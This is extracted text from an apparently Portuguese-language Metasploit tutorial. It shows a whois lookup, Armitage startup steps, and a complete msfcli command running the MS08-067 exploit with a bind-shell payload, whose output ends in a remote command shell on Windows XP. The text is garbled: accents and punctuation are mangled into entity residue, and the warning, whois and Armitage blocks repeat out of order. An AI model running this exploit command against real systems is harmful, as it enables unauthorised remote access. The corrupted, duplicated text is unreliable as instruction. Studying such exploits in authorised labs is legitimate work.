quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
PROMPT WINDOWS REMOTO
rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
Running Armitage
To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
Acumulando o reconhecimento do ambiente
Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode
danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o
ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS
quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute
rastrear teus passos depois do evento
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM
whois Lookups
msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM